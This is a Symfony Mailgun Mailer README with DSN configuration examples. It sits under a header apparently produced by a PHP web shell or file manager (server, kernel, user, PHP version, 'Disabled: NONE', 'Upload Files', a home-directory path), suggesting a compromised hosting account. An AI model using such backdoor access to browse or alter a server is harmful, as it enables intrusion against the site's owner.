HEX
Server: LiteSpeed
System: Linux s1049.use1.mysecurecloudhost.com 4.18.0-477.27.2.lve.el8.x86_64 #1 SMP Wed Oct 11 12:32:56 UTC 2023 x86_64
User: xedaptot (3356)
PHP: 8.3.31
Disabled: NONE
Upload Files
File: /home/xedaptot/iphim.naniguide.com/vendor/symfony/mailgun-mailer/README.md
Mailgun Mailer
==============

Provides Mailgun integration for Symfony Mailer.

Configuration example:

```env
# SMTP
MAILER_DSN=mailgun+smtp://USERNAME:PASSWORD@default?region=REGION

# HTTP
MAILER_DSN=mailgun+https://KEY:DOMAIN@default?region=REGION

# API
MAILER_DSN=mailgun+api://KEY:DOMAIN@default?region=REGION
```

where:
 - `KEY` is your Mailgun API key
 - `DOMAIN` is your Mailgun sending domain
 - `REGION` is Mailgun selected region (optional)

Resources
---------

 * [Contributing](https://symfony.com/doc/current/contributing/index.html)
 * [Report issues](https://github.com/symfony/symfony/issues) and
   [send Pull Requests](https://github.com/symfony/symfony/pulls)
   in the [main Symfony repository](https://github.com/symfony/symfony)